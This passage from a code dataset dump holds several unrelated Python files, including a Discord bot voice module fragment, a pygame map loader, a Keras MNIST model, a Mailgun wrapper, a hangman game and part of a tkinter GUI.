self.set_previous_channel(channel)\n\n if len(self.player_queue) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Player queue is empty\",\n discord.Color.dark_blue()\n )\n )\n return\n\n random.shuffle(self.player_queue)\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Shuffled player queue\",\n discord.Color.blue()\n )\n )\n\n def player_queue_set_limit(self, limit: int) -> None:\n \"\"\"Set the player queue limit\"\"\"\n\n if limit <= 0:\n return\n\n self.player_queue_limit = limit\n\n while len(self.player_queue) > self.player_queue_limit:\n self.player_queue.pop()\n\n def set_volume(self, volume: float) -> None:\n \"\"\"Set player volume\"\"\"\n\n volume = round(volume, 2)\n if volume > self.player_volume_limit:\n volume = self.player_volume_limit\n\n self.player_volume = volume\n if self.is_media_playing() or self.is_media_paused():\n self.voice_client.source.volume = self.player_volume\n\n def set_volume_limit(self, volume: float) -> None:\n \"\"\"Set volume limit\"\"\"\n\n self.player_volume_limit = round(volume, 2)\n self.apply_volume_limit()\n\n def apply_volume_limit(self) -> None:\n \"\"\"Make sure that the volume limit is respected\"\"\"\n\n if self.player_volume > self.player_volume_limit:\n self.set_volume(self.player_volume_limit)","repo_name":"hoot-w00t/marcel-the-bot","sub_path":"marcel/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":34050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6808461187","text":"import os\nimport pandas as pd\nimport pygame\nfrom typing import List\n\nfrom matplotlib import pyplot as plt\nfrom pandas import DataFrame\n\nfrom src.game.gamelogic import weapon\nfrom src.game.gamelogic.item import Item\nfrom src.game.gamelogic.weapon import WeaponType\n\nfrom src.game.gamelogic.background_music import Music\n\n\nclass Map:\n solid_df: DataFrame\n staticimages = list() # type: List[pygame.surface.Surface]\n player_uris = list() # type: List[str]\n\n def __init__(self, game, uri: str) -> None:\n \"\"\"\n Initialize a new instance of the Inventory class.\n\n :param game: The instance of the game\n :param uri: A string containing the path to the directory.\n \"\"\"\n self.game = game\n self.directory = uri\n self.items = list() # type: ignore[var-annotated]\n self.weapon_path = {\n weapon.WeaponType.Sword.name: self.directory + \"\\\\waffen\\\\schwert\\\\Sword.png\",\n weapon.WeaponType.Laser.name: self.directory + \"\\\\waffen\\\\laser\\\\laser.png\"\n }\n self.music = None\n self.music_load()\n\n # load background\n try:\n self.background = pygame.image.load(uri + r'/background.png').convert_alpha()\n except:\n self.background = \"no image found\" # type: ignore[assignment]\n\n # load player images\n for directory in next(os.walk(self.directory + r'\\player\\animation'))[1]:\n if directory[-3:] == 'png':\n print(str(directory) + ' is no folder')\n continue\n self.player_uris.append(os.path.join(self.directory + r'\\player\\animation', directory))\n print(\"directory:\", os.path.join(self.directory + r'\\player', directory))\n\n # load solid images and add solid pixels to solid list\n for filename in os.listdir(self.directory + r'/solid'):\n simg = os.path.join(self.directory + r'/solid', filename)\n if not os.path.isfile(simg):\n print(str(simg) + ' is not a file')\n continue\n\n # load image for displaying\n try:\n img = pygame.image.load(simg)\n img = img.convert_alpha()\n except:\n continue\n print(str(simg) + ' successfully loaded into pygame')\n self.staticimages.append(img)\n\n # combine all static images into one, then use laplace to detect edges.\n # use these to generate array of edge pixels and save it in solid.\n solid = list()\n solid_images = self.staticimages.copy()\n if len(solid_images) != 0:\n combinded_solid_image = solid_images.pop()\n for image in solid_images:\n combinded_solid_image.blit(image, (0, 0))\n combinded_solid_image = combinded_solid_image.convert_alpha()\n self.edge_surface = pygame.transform.laplacian(combinded_solid_image).convert_alpha()\n alpha_array = pygame.surfarray.pixels_alpha(self.edge_surface)\n alpha_array = alpha_array.swapaxes(0, 1)\n for yi, y in enumerate(alpha_array):\n for xi, x in enumerate(y):\n if x > 100:\n solid.append((xi, yi))\n\n # Add surface borders\n # vertical edges\n for y in range(-self.game.height, self.game.height):\n solid.append((0, y))\n solid.append((self.game.width, y))\n\n self.solid_df = pd.DataFrame(solid, columns=['x', 'y'])\n\n # generate one picture out of all solid and not solid images.\n comb_images = self.staticimages.copy()\n if len(comb_images) != 0:\n self.static_objects_img = comb_images.pop()\n for image in comb_images:\n self.static_objects_img.blit(image, (0, 0))\n self.static_objects_img = self.static_objects_img.convert_alpha()\n\n def setitems(self, item_dict) -> None:\n \"\"\"\n Set the items on the game board based on the item dictionary.\n :param item_dict: Dictionary containing weapon names as keys and a list of positions as values.\n \"\"\"\n # Iterate through each item in the dictionary\n for k, v in item_dict.items():\n # Iterate through each position for the current item\n for pos in v:\n # Check if the item is already in the game\n if not list(map(lambda i: [i.x, i.y], self.items)).__contains__(pos):\n # Create a new Item object for the current position and add it to the game's items list\n self.items.append(Item(WeaponType.getObj(k), pos, self.weapon_path[k]))\n\n # Iterate through each item in the game's items list\n for i in self.items:\n # Check if the item's position is in the dictionary\n if not item_dict[i.type.name].__contains__([i.x, i.y]):\n # If the item is not in the dictionary, remove it from the game's items list\n self.items.remove(i)\n\n def draw_items(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draw all items in the game on the given screen.\n\n :param screen: The surface on which to draw the items.\n \"\"\"\n for i in self.items:\n i.draw(screen)\n\n def draw_background(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draws the game background on the screen using Pygame blit function\n\n :param screen: Pygame screen object to blit the background on\n :return: None\n \"\"\"\n canvas_rec = pygame.Rect(0, 0, self.game.width, self.game.height)\n if isinstance(self.background, pygame.Surface):\n screen.blit(self.background, canvas_rec)\n\n def draw_solids(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draw the static objects (solids) on the screen\n\n :param screen: Pygame screen object to blit the solids on\n \"\"\"\n canvas_rec = pygame.Rect(0, 0, self.game.width, self.game.height)\n if len(self.staticimages) != 0:\n screen.blit(self.static_objects_img, canvas_rec)\n\n def music_load(self):\n \"\"\"\n Loads the music from the folder and starts playing it\n :return:\n \"\"\"\n # Load Music\n self.music = Music(self.directory + r\"\\music\", 1.0)\n # Start Music\n self.music.play() # type: ignore[attr-defined]\n","repo_name":"chips199/Projektpraktikum","sub_path":"src/game/gamelogic/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74010000145","text":"\"\"\"\nAdd mypy type-checking cell magic to jupyter/ipython.\n\nSave this script to your ipython profile's startup directory.\n\nIPython's directories can be found via `ipython locate [profile]` to find the current ipython directory and ipython profile directory, respectively.\n\nFor example, this file could exist on a path like this on mac:\n\n/Users/yourusername/.ipython/profile_default/startup/typecheck.py\n\nwhere /Users/yourusername/.ipython/profile_default/ is the ipython directory for\nthe default profile.\n\nThe line magic is called \"typecheck\" to avoid namespace conflict with the mypy\npackage.\n\n\"\"\"\n\nfrom IPython.core.magic import register_cell_magic\n\n\n@register_cell_magic\ndef typecheck(line, cell):\n \"\"\"\n Run the following cell though mypy.\n\n Any parameters that would normally be passed to the mypy cli\n can be passed on the first line, with the exception of the\n -c flag we use to pass the code from the cell we want to execute\n\n i.e.\n\n %%typecheck --ignore-missing-imports\n ...\n ...\n ...\n\n mypy stdout and stderr will print prior to output of cell. If there are no conflicts,\n nothing will be printed by mypy.\n \"\"\"\n\n from IPython import get_ipython\n from mypy import api\n\n mypy_result = api.run(line.split() + ['-c', cell])\n\n if mypy_result[0]: # print mypy stdout\n print(mypy_result[0])\n\n if mypy_result[1]: # print mypy stderr\n print(mypy_result[1])\n\n shell = get_ipython()\n shell.run_cell(cell)","repo_name":"knowsuchagency/jupyter-mypy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15944462372","text":"# Adapted KERAS tutorial \n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, AlphaDropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n\nbatch_size = 128\nnum_classes = 10\nepochs = 30\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, shuffled and split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\n# x_train = (x_train - np.mean(x_train))/np.std(x_train)\n\nx_test /= 255\n# x_test = (x_test - np.mean(x_train))/np.std(x_train)\n\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='selu', input_shape=input_shape, kernel_initializer='lecun_normal',\n bias_initializer='zeros'))\nmodel.add(Conv2D(64, (3, 3), activation='selu', kernel_initializer='lecun_normal', bias_initializer='zeros'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(AlphaDropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='selu', kernel_initializer='lecun_normal', bias_initializer='zeros'))\nmodel.add(AlphaDropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax', kernel_initializer='lecun_normal', bias_initializer='zeros'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\nf = open('MNIST_SELU_results.txt', 'a')\nf.write('Test loss:' + str(score[0]) + ' Test accuracy:' + str(score[1]) + '\\n') # python will convert \\n to os.linesep\nf.close()\n","repo_name":"26hzhang/AmusingPythonCodes","sub_path":"snns/keras-cnn/MNIST-Conv-SELU.py","file_name":"MNIST-Conv-SELU.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"7825143914","text":"def replace_aeiou(w):\n for c in 'aeiou':\n w = w.replace(c, \"~\")\n return w\n\n\nclass Solution(object):\n def spellchecker(self, wordlist, queries):\n \"\"\"\n :type wordlist: List[str]\n :type queries: List[str]\n :rtype: List[str]\n \"\"\"\n direct = set(wordlist)\n to_lower = dict()\n replace = dict()\n for w in wordlist:\n lower = w.lower()\n if lower not in to_lower.keys():\n to_lower[lower] = w\n for c in 'aeiou':\n lower = lower.replace(c, \"~\")\n if lower not in replace.keys():\n replace[lower] = w\n\n r = [\"\"] * len(queries)\n for i, q in enumerate(queries):\n if q in direct:\n r[i] = q\n\n queries = [(x.lower(), i) for i, x in enumerate(queries) if not r[i]]\n for lower, i in queries:\n r[i] = to_lower.get(lower, \"\")\n\n queries = [(replace_aeiou(x), i) for x, i in queries if not r[i]]\n for r_, i in queries:\n r[i] = replace.get(r_, \"\")\n return r\n\n\ns = Solution()\nprint(s.spellchecker(wordlist = [\"KiTe\",\"kite\",\"hare\",\"Hare\", \"iaf\"], queries = [\"kite\",\"Kite\",\"KiTe\",\"Hare\",\"HARE\",\"Hear\",\"hear\",\"keti\",\"keet\",\"keto\", \"AIF\"]))\n","repo_name":"0as1s/leetcode","sub_path":"966_spellChecker.py","file_name":"966_spellChecker.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14506046745","text":"import requests\nimport datetime\n\n\ndef get_email_stored_events(api_key, endpoint):\n yesterday = datetime.datetime.now() - datetime.timedelta(1)\n return requests.get(\n '{}/events'.format(endpoint),\n auth=('api', api_key),\n params={\n 'begin': yesterday.isoformat(),\n 'ascending': 'yes',\n 'limit': 1\n }\n )\n\n\ndef get_stored_email_urls(api_key, endpoint):\n response = get_email_stored_events(api_key, endpoint)\n data = response.json()\n\n for item in data.get('items', []):\n if 'storage' in item:\n if 'url' in item['storage']:\n yield item['storage']['url']\n\n\ndef get_message(api_key, url):\n return requests.get(\n url,\n auth=('api', api_key)\n )\n\n\ndef send_message(api_key, endpoint, name, subject, text, from_address, recipients):\n \"\"\"\n * subject: Subject of the email.\n * text: Text body of the email.\n * from_email: The email address that the message will be sent from.\n * recipients: A list of recipient email addresses.\n \"\"\"\n return requests.post(\n endpoint,\n auth=('api', api_key),\n data={\n 'from': '%s <%s>' % (name, from_address),\n 'to': recipients,\n 'subject': subject,\n 'text': text\n }\n )\n","repo_name":"NoobSolver/Chatbot","sub_path":"Chatterbot/api/mailgun.py","file_name":"mailgun.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42665709182","text":"import os\nimport re\nimport sys\n\ntry :\n regexp_format = re.compile(r'{}'.format(input(\"Provide regexp\")))\nexcept re.error :\n print(\"bad regexp\")\n sys.exit()\n\nfor file in os.listdir(os.getcwd()) :\n if file.endswith(\".txt\") :\n file = open(file, \"r\")\n for line in file.readlines() :\n z = re.search(regexp_format, line)\n if z :\n print(file.name + \": \")\n print(line)\n file.close()\n","repo_name":"mstachniuk/tietopythontraining-basic","sub_path":"lesson_09_reading_and_writing_files/reg_in_files.py","file_name":"reg_in_files.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34362736432","text":"from owslib.wms import WebMapService\nfrom owslib.wfs import WebFeatureService\nfrom owslib.wmts import WebMapTileService\nfrom PyQt4.QtCore import QSettings\n\nimport re\n\nclass LdsInterface():\n def __init__(self, api_key_instance):\n self.api_key_instance = api_key_instance\n self.key = self.api_key_instance.get_api_key()\n self.resp = {}\n \n def keyChanged(self):\n self.key = self.api_key_instance.get_api_key()\n \n def hasKey(self):\n if not self.key:\n return False\n return True\n \n def getServiceData(self, service):\n self.resp = {'err' : None,\n 'resp': None,\n 'info': None}\n \n # Request - Get Info for the service\n self.request(service)\n if self.resp['err']:\n return self.resp\n \n # Format the response data\n self.service_info()\n \n return self.resp\n\n\n def request(self, service):\n\n try: \n\n if service == 'WMS':\n self.resp['resp'] = WebMapService(\"https://data.linz.govt.nz/services;\"\n \"key=\"+self.key+\n \"/wms/\", \n version='1.1.1')\n return\n if service == 'WMTS':\n self.resp['resp'] = WebMapTileService(\"https://data.linz.govt.nz/services;\"\n \"key=\"+self.key+\n \"/wmts/1.0.0/WMTSCapabilities.xml?\"\n \"count=10\", \n version='1.0.0')\n return\n if service == 'WFS':\n self.resp['resp'] = WebFeatureService(\"https://data.linz.govt.nz/services;\"\n \"key=\"+self.key+\n \"/wfs/?\"\n \"service=WFS&\"\n \"request=GetCapabilities\",\n version='1.1.0')\n return\n \n except:\n self.resp['err'] = \"ERROR: Something went wrong with the request. Timeout? Incorrect API KEY?\"\n\n # pass\n #how do I get at owslibs exceptions?\n \n def service_info(self):\n service_data = []\n resp = self.resp['resp']\n cont = (resp.contents)\n \n for c in cont:\n # standardise the different services string formatting\n cont_id = re.search(r'([aA-zZ]+\\.[aA-zZ]+\\.[aA-zZ]+\\.[aA-zZ]+\\:)?(?P[aA-zZ]+)-(?P[0-9]+)', resp[c].id)\n type = cont_id.group('type')\n id = cont_id.group('id')\n service_type = resp.identification.type.upper().strip('OGC:').strip(' ')\n \n service_data.append([type, id, service_type, resp[c].title, resp[c].abstract])\n \n self.resp['info'] = service_data\n \n \n ","repo_name":"SPlanzer/QGIS-LDS-Plugin","sub_path":"ldsplugin/lds_interface.py","file_name":"lds_interface.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8880533129","text":"import gin\n\nfrom models.ActorCritic import ActorCritic, AtariActorCritic\n\n\n@gin.configurable\ndef create_dqn_agent(env):\n env_name = env.unwrapped.spec.id\n # action_space = env.action_space\n # observation_shape = env.observation_space.shape\n if env_name in [\"CartPole-v0\"]:\n return ActorCritic(env)\n elif env_name.startswith(\"Pong\"):\n return AtariActorCritic(env)\n\n raise ValueError(f\"Can't create DQN model for {env_name} environment\")\n","repo_name":"probably-nothing1/ActorCritic","sub_path":"src/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15573627043","text":"import random\n\n\nclass Color:\n \"\"\"\n Sets colors to be called for different texts.\n \"\"\"\n RESET = '\\033[0m'\n BLUE = '\\u001b[34m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n YELLOW = '\\u001b[33m'\n\n\ndef get_new_word():\n \"\"\"\n Selects a random word from the words.txt file opened in read format\n at the beginning of the game.\n Ensures a new random word evry time the game is played.\n \"\"\"\n with open('words.txt', 'r') as word_list:\n words = word_list.readlines()\n any_word = random.choice(words)[:-1].upper()\n return any_word\n\n\ndef introduction_page():\n \"\"\"\n The initial introduction to the hangman game.\n The player can read the instuctions or begin the game.\n \"\"\"\n word = get_new_word()\n hangman_sign()\n print(hangman_construction(0))\n print(f\"Type {Color.BLUE}1 {Color.RESET} to start the game\\n\")\n print(f\"Type {Color.BLUE}2 {Color.RESET} to read the instructions\")\n selection = False\n while not selection:\n decision = input(\"\\n\")\n if decision == \"1\":\n selection = True\n begin_game(word)\n elif decision == \"2\":\n selection = True\n game_instructions()\n else:\n print(f\"\\n{Color.YELLOW}Please type {Color.BLUE}1 {Color.YELLOW}or\"\n f\"{Color.BLUE} 2 {Color.YELLOW}to make your decision.\"\n f\"{Color.RESET}\")\n\n\ndef game_instructions():\n \"\"\"\n Gives the player the instructions to play the game.\n \"\"\"\n print(\n \"\"\"\n The object of the game is to guess the word.\n Do this by entering in one letter each go.\n If you enter a wrong letter a life will be taken from you.\n If you lose all your lives, say goodbye to the hanging individual.\n Guess the word before your lives hit 0 and you are a hero.\n \"\"\"\n )\n\n begin = input(\"Press the enter key to begin the game.\\n\")\n introduction_page()\n\n\ndef begin_game(word):\n \"\"\"\n Starts the game for the user\n checks if the letter the player inputs is in the hidden word.\n if the letter is correct,game will iterate through hidden word\n and letter will go into correct position.\n if incorrect,a message will be relayed to the user.\n player can see how many lives are left to complete the game.\n\n \"\"\"\n correct_word = \"_\" * len(word)\n completed = False\n guessed_letters = []\n lives = 6\n print(\"Help Me!!!\\n\")\n print(f\"Lives left {lives}\\n\")\n while completed is not True and lives > 0:\n print(hangman_construction(lives))\n print(correct_word)\n guess = input('Give me some letters please \\n')\n if len(guess) == 1 and guess.isalpha(\n ) and guess not in guessed_letters:\n if guess.upper() in word:\n guessed_letters.append(guess)\n word_list = list(correct_word)\n indices = [i for i, letter in enumerate(\n word) if letter == guess.upper()]\n for index in indices:\n word_list[index] = guess\n correct_word = \"\".join(word_list)\n print(f\"\\n{Color.GREEN}Great!! {Color.RESET}{guess}\"\n f\" {Color.GREEN}is in the word! \\n{Color.RESET}\")\n if '_' not in correct_word:\n completed = True\n else:\n print(f\"\\n{Color.YELLOW}Oh no! {Color.RESET}{guess}\"\n f\"{Color.YELLOW} isn't in the word!\\n{Color.RESET}\")\n lives -= 1\n print(f\"Lives left: {lives} \\n\")\n guessed_letters.append(guess)\n print(\n \"Tried these already: \" +\n \", \".join(guessed_letters) +\n \"\\n\")\n elif len(guess) != 1:\n print(f\"\\n{Color.YELLOW}Oops!, \"\n f\"Your only allowed to guess {Color.RESET}1\"\n f\" {Color.YELLOW}letter at a time.\")\n print(f\"You used {Color.RESET}{len(guess)} \"\n f\"{Color.YELLOW}characters.\\n{Color.RESET}\")\n elif guess in guessed_letters:\n print(f\"\\n{Color.YELLOW}You have already used me\"\n f\" {Color.RESET}{guess}{Color.YELLOW}!{Color.RESET}\")\n lives -= 1\n if completed:\n win_sign()\n print(f\"{Color.GREEN}Well Done!\"\n \"You are a hero!\")\n else:\n lose_sign()\n print(\"Looks like you arent a hero, \"\n \"Do NOT quit your day job.\")\n print(f\"The word was: {Color.RESET}{word}{Color.RED}.{Color.RESET}\")\n start_game_again()\n\n\ndef start_game_again():\n \"\"\"\n Asks if the user wants to start the game again.\n If not, returns to main screen.\n \"\"\"\n start_again_option = input(f\"\\nWould you like to try again? \"\n f\"{Color.BLUE}Y{Color.RESET}/{Color.BLUE}N\\n\"\n f\"{Color.RESET}\").upper()\n if start_again_option == \"Y\":\n word = get_new_word()\n begin_game(word)\n elif start_again_option == \"N\":\n exit()\n else:\n print(\n f\"{Color.YELLOW}Time to decide {Color.BLUE}Y {Color.YELLOW}\"\n f\"or {Color.BLUE}N{Color.YELLOW}. You chose \"\n f\"{Color.RESET}{start_again_option}{Color.YELLOW}.{Color.RESET}\\n\")\n start_game_again()\n\n\ndef hangman_construction(lives):\n \"\"\"\n Shows the user how man lives are left before the games ends.\n \"\"\"\n stages = [f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n | / \\\\\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n | /\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | |\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n |\n |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n \"\"\"\n =======\n |/ |\n |\n |\n |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\"\n ]\n return stages[lives]\n\n\ndef hangman_sign():\n \"\"\"\n A title graphic to be displayed on the title screen.\n \"\"\"\n print(\n \"\"\"\n ██╗ ██╗█████╗███╗ ██╗██████╗███╗ ███╗█████╗███╗ ██╗\n ██║ ████╔══██████╗ ████╔════╝████╗ ██████╔══██████╗ ██║\n ████████████████╔██╗ ████║ █████╔████╔███████████╔██╗ ██║\n ██╔══████╔══████║╚██╗████║ ████║╚██╔╝████╔══████║╚██╗██║\n ██║ ████║ ████║ ╚████╚██████╔██║ ╚═╝ ████║ ████║ ╚████║\n ╚═╝ ╚═╚═╝ ╚═╚═╝ ╚═══╝╚═════╝╚═╝ ╚═╚═╝ ╚═╚═╝ ╚═══\n \"\"\"\n )\n\n\ndef win_sign():\n \"\"\"\n Displays a win sign for when the player correctly guesses the word\n to let them know they were correct.\n \"\"\"\n print(\n f\"\"\"{Color.GREEN}\n ::: ::: ::::::::::: :::: :::\n :+: :+: :+: :+:+: :+:\n +:+ +:+ +:+ :+:+:+ +:+\n +#+ +:+ +#+ +#+ +#+ +:+ +#+\n +#+ +#+#+ +#+ +#+ +#+ +#+#+#\n#+#+# #+#+# #+# #+# #+#+#\n### ### ########### ### ####\n {Color.RESET}\"\"\"\n )\n\n\ndef lose_sign():\n \"\"\"\n Displays a lose sign for when the player fails to guess the word\n to let them know the lost the game.\n \"\"\"\n print(\n f\"\"\"{Color.RED}\n :::::::::: ::: ::::::::::: :::\n :+: :+: :+: :+: :+:\n +:+ +:+ +:+ +:+ +:+\n :#::+::# +#++:++#++: +#+ +#+\n +#+ +#+ +#+ +#+ +#+\n #+# #+# #+# #+# #+#\n ### ### ### ########### ##########\n {Color.RESET}\"\"\"\n )\n\n\nintroduction_page()\n\n","repo_name":"Ryan-Martin22/hangman-2022","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1412372153","text":"import subprocess\n\n# class bash_exe:\n# \tdef __init__(self):\n# \t\tpass\n\ndef execute_command(cmdlist,repopath,out,err):\n\tcmd = \" \".join(cmdlist)\n\treturn_code = subprocess.Popen('cd '+ repopath + ' && ' +cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tstatus = return_code.returncode\n\toutput, error = return_code.communicate()\n\twith open(out,'wb') as f:\n\t\tf.write(output)\n\twith open(err,'wb') as f:\n\t\tf.write(error)\n\n# if __name__ == '__main__':\n# \tbe = bash_exe()\n# \tcmd = ['ls','-l']\n# \tstdout = 'stdout.txt'\n# \tstderr = 'stderr.txt'\n# \tbe.execute_command(cmd,\"/home/lingling/wubozhi/datapreprocess/commits\",stdout,stderr)","repo_name":"wubozhi/repos2cpg","sub_path":"bash_exe.py","file_name":"bash_exe.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41515470563","text":"# import tkinter\r\n# import tkconstants\r\n# import tkFileDialog\r\nimport os\r\n# from tkinter import *\r\nimport tkinter\r\nfrom tkinter import constants\r\nfrom tkinter import filedialog\r\n#from tkMessageBox import showerror\r\n# from PIL import Image,ImageTk\r\nimport popupMsg\r\n\r\nclass SelectStudyYears(tkinter.Frame):\r\n def __init__(self, root, parent):\r\n tkinter.Frame.__init__(self, root, border = 5)\r\n self.root = root\r\n self.parent = parent\r\n body = tkinter.Frame(self)\r\n body.pack(fill=constants.X, expand=1)\r\n body.grid_columnconfigure(1, weight=2)\r\n\r\n current_row = 0\r\n tkinter.Label(body, text=u\"Year Selection\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row)\r\n current_row += 1\r\n\r\n self.is_selected_year = {}\r\n for year in parent.studyYearList:\r\n self.is_selected_year[year] = tkinter.BooleanVar(self.root)\r\n if year in parent.selected_study_years:\r\n self.is_selected_year[year].set(True)\r\n tkinter.Checkbutton(body, text = year, variable = self.is_selected_year[year], font = (\"Helvetica\", 8)).grid(row=current_row, sticky = 'W')\r\n current_row += 1\r\n\r\n tkinter.Button(body, text=u\"Select\", font=(\"Helvetica\", 8, 'bold'),width=10,command=lambda: self.record_selection()).grid(row=current_row)\r\n\r\n def record_selection(self):\r\n selection = []\r\n for year in self.is_selected_year:\r\n if self.is_selected_year[year].get():\r\n selection.append(year)\r\n self.parent.selected_study_years = ','.join(selection)\r\n self.parent.studyyears.delete(0, constants.END)\r\n self.parent.studyyears.insert(0, self.parent.selected_study_years)\r\n self.root.destroy()\r\n pass\r\n\r\n\r\nclass CreateScenarioGUI(tkinter.Frame):\r\n def __init__(self, root, emme_version = \"4.3.7\", year = \"2016\", geo = \"1\", lu = \"DS41\"):\r\n tkinter.Frame.__init__(self, root, border=5)\r\n body = tkinter.Frame(self)\r\n body.pack(fill=constants.X, expand=1)\r\n sticky = constants.E + constants.W\r\n body.grid_columnconfigure(1, weight=2)\r\n\r\n #Define land use options\r\n self.lu_options = {\"DS41\": {\"name\": \"Baseline\",\r\n \"years\": [\"2020\", \"2025nb\", \"2030nb\", \"2035nb\", \"2040nb\", \"2050nb\"]},\r\n \"DS42\": {\"name\": \"Sustainable Community Strategy\",\r\n \"years\": [\"2016\", \"2023\", \"2025\", \"2026\", \"2029\", \"2030\", \"2032\", \"2035\", \"2040\", \"2050\"]}}\r\n\r\n self.root = root\r\n self.emme_version = emme_version\r\n self.year = year\r\n self.geo = geo \r\n self.lu = lu\r\n \r\n if self.year not in self.lu_options[self.lu][\"years\"]:\r\n if self.year in self.lu_options[\"DS41\"][\"years\"]:\r\n self.lu = \"DS41\"\r\n else:\r\n self.lu = \"DS42\"\r\n\r\n yearOptionList = []\r\n for lu in self.lu_options:\r\n yearOptionList += self.lu_options[lu][\"years\"]\r\n yearOptionList = list(set(yearOptionList)) #Remove duplicates\r\n yearOptionList.sort()\r\n\r\n self.yearOptionList = yearOptionList\r\n self.studyYearList = [\"2016\", \"2020\", \"2023\", \"2025_Vision\", \"2025nb\", \"2026_Vision\", \"2029_Vision\",\r\n \"2030_Vision\", \"2030nb\", \"2032_Vision\", \"2035_Vision\", \"2035nb\", \"2040_Vision\",\r\n \"2040nb\", \"2050_Vision\", \"2050nb\"]\r\n\r\n #divider line\r\n divider=u\"_\"*200\r\n self.releaseDir='T:\\\\ABM\\\\release\\\\ABM'\r\n self.defaultScenarioDir=\"T:\\\\projects\\\\sr14\"\r\n self.defaultNetworkDir=\"T:\\\\RTP\\\\2021RP\\\\2021rp_final\\\\network_build\"\r\n\r\n current_row = 0\r\n n_columns = 3\r\n\r\n self.buttonVar= tkinter.IntVar(root)\r\n self.yButton=tkinter.Radiobutton(body, text=\"Yes\", variable=self.buttonVar, value=1, command=self.initStudy)\r\n self.nButton=tkinter.Radiobutton(body, text=\"No\", variable=self.buttonVar, value=0,command=self.initStudy)\r\n tkinter.Label(body, text=u\"Release Version 14.3.0\\n\"+divider, font=(\"Helvetica\", 11, 'bold'), width=50, fg='royal 